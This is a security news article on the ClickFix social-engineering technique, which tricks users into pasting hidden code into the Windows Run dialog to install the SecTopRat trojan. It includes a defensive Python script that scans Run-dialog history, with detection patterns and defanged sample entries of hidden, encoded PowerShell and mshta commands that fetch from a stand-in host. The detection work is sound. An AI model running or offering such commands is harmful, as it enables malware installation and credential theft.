An old trick with a new twist

ClickFix strikes again – The return of an insidious key combination


Despite its age, the ClickFix method remains a popular tool in the arsenal of cybercriminals. Security researchers from Sophos X-Ops came across the sophisticated attack tactic again in their latest analysis.

Particularly affected in March: companies with intensive use of calendar and CRM systems. These included car dealerships, clinics and doctors’ surgeries – they accounted for around a quarter of those affected.


How the attack works

The scam seems harmless – and that’s exactly what makes it so dangerous. Attackers inject manipulated JavaScript code via compromised WordPress pages or malicious website plugins. The code tricks users into pressing a certain key combination – supposedly as part of a security check. In reality, the Windows “Run” dialog opens, and hidden code is pasted into it and executed. The result: the SecTopRat Trojan is installed and spies on login data, bank details and company access.

A perennial favorite in the hacker’s toolbox

Whether used by state-controlled groups or individual perpetrators, ClickFix remains a favorite attack method. Why? Because the trick works. Stolen credentials can be used to compromise networks quickly and effectively. The market for this is booming – and ClickFix delivers reliably.

Prevention is the best protection

Even though the technique is not new, its potential remains high. Sophos X-Ops warns that ClickFix will be with us for a long time to come. This makes it all the more important to train employees and raise their awareness. If you know the scam, you won’t click blindly. Technical vigilance is also required: security solutions such as NDR (Network Detection and Response) or MDR (Managed Detection and Response) help to detect and stop suspicious processes, such as atypical PowerShell commands or unusual use of the “Run” function, in good time.
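To illustrate what checking for unusual use of the “Run” function can look like, here is an added example (not code from Sophos or from this article) that triages a user's Run-dialog history, which Windows stores under the `RunMRU` registry key. The rule names, the two-hit threshold and the sample entries are assumptions made for this example.

```python
import re

# Per-user registry key where Windows keeps Run-dialog (Win+R) history.
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristic rules: assumptions for this example, tune them to your environment.
RULES = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|cmd)\b", re.I),
    "hidden_or_encoded": re.compile(
        r"-(w|win|windowstyle)\s+(h|hidden)\b|-(e|enc|encodedcommand)\s", re.I),
    "remote_url": re.compile(r"\b(https?|hxxps?)://", re.I),
    "lure_text": re.compile(r"not a robot|captcha|verif(y|ication)", re.I),
}

# Constructed, defanged sample of RunMRU values (not taken from a real incident).
SAMPLE = {
    "MRUList": "bcda",
    "a": r"\\fileserver\share\1",
    "b": r"powershell -w hidden -enc <BASE64-PLACEHOLDER> # I am not a robot - Verification ID 0000\1",
    "c": r"mshta hxxps://example.invalid/check\1",
    "d": r"cmd\1",
}

def triage(values, min_hits=2):
    """Return (entry, command, matched_rules) for suspicious entries, newest first."""
    findings = []
    for name in values.get("MRUList", ""):
        command = values.get(name, "")
        if command.endswith("\\1"):      # Explorer appends "\1" to each stored entry
            command = command[:-2]
        hits = [rule for rule, rx in RULES.items() if rx.search(command)]
        if len(hits) >= min_hits:        # one hit alone (e.g. plain "cmd") is normal use
            findings.append((name, command, hits))
    return findings

if __name__ == "__main__":
    for name, command, hits in triage(SAMPLE):
        print(f"{RUNMRU_KEY}\\{name}: {command!r} -> {', '.join(hits)}")
```

On a Windows host the same `triage` function can be fed values read from the key with Python's `winreg` module instead of the constructed sample.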


Conclusion:

ClickFix is a prime example of how old tricks with a bit of disguise can become modern threats. Vigilance, education and modern security solutions are the best weapons in the fight against this digital deception.

(vp/Sophos)
